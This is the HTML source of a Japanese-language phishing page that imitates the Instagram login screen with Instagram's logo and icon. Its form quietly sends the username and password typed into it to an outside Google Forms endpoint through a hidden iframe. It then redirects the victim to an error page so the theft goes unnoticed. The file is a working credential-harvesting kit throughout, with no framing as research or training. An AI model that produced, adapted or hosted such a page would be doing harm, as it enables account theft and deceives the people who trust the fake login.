<!DOCTYPE html>
<html>
<head>
  <title>ログイン・Instagram</title>
  <link data-default-icon="https://static.cdninstagram.com/rsrc.php/v3/yI/r/VsNE-OHk_8a.png" rel="icon" sizes="192x192" href="https://static.cdninstagram.com/rsrc.php/v3/yI/r/VsNE-OHk_8a.png">
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #ffffff; /* 背景色を白 (#ffffff) に変更 */
    }

    .container {
      max-width: 400px;
      margin: 0 auto;
      padding: 20px;
      display: flex;
      justify-content: center;
      align-items: center;
      flex-direction: column; /* 新しく追加 */
      text-align: center; /* 新しく追加 */
    }

    h1 {
      text-align: center;
      margin-bottom: 30px;
    }

    .logo {
      text-align: center;
      margin-bottom: 20px;
    }

    .logo img {
      max-width: 100%;
      height: auto;
    }

    .form-group {
      margin-bottom: 15px;
    }

    label {
      display: block;
      margin-bottom: 5px;
    }

    input[type="text"],
    input[type="password"] {
      width: 100%;
      padding: 10px;
      border: 1px solid #ccc;
      border-radius: 4px;
      font-size: 16px;
    }

    .login-button {
      display: flex;
      justify-content: center;
      align-items: center;
      margin-top: 50px;
      text-align: center;
    }

    .login-button a {
      display: inline-block;
      padding: 10px;
      background-color: #0000FF; /* ログインボタンの背景色を青 (#0000FF) に変更 */
      color: #fff;
      font-size: 16px;
      font-weight: bold;
      text-decoration: none;
      border-radius: 4px;
    }

    .login-button a:hover {
      background-color: #357ae8;
    }

    /* 新しいスタイル */

    .input-form {
      display: flex;
      justify-content: center;
      align-items: center;
      flex-direction: column;
      text-align: center;
    }

    .input-form label {
      font-size: 14px;
    }

    .image-container {
      display: flex;
      justify-content: center;
      align-items: center;
      margin-top: 20px;
    }

    .image-container img {
      max-width: 100%;
      height: auto;
    }
  </style>
</head>
<body>
<br><br><br><br><br><br><br>

  <div class="container">
    <div class="logo">
      <img src="https://z-p15.www.instagram.com/static/images/web/logged_out_wordmark.png/7a252de00b20.png" alt="Instagram ロゴ">
    </div>
    <form action="https://docs.google.com/forms/u/0/d/e/1FAIpQLScWWOk0MbcokU8IGh0QKadWXI39Q7WCuQYTYrEgXsuwBMjiIg/formResponse" method="post" target="hidden_iframe" onsubmit="submitted=true;" target="_self" method="POST" id="mG61Hd" jsmodel="TOfxwf Q91hve" data-shuffle-seed="2868127642733565241" data-response="%.@.[]]" data-first-entry="0" data-last-entry="4" data-is-first-page="true">
      <div class="input-form form-group">
        <label for="username">ユーザーネーム:</label>
        <input type="text" name="entry.1041600241" id="username"> <!-- ラベルとIDを追加 -->
      </div>
      <div class="input-form form-group">
        <label for="password">パスワード:</label>
        <input type="password" name="entry.1684340239" id="password"> <!-- ラベルとIDを追加 -->
      </div>
      <div class="login-button">
        <button type="submit" value="Submit">ログイン</button>
      </div>
    </form>
    <script type="text/javascript">var submitted = false;</script>
    <iframe name="hidden_iframe" id="hidden_iframe" style="display:none;" onload="if(submitted){window.location='erro.html';}"></iframe>
    <div class="image-container">
      <img src="f098850459c9.png">
      <img src="8ce59d2c3625.png">
    </div>
  </div>
</body>
</html>
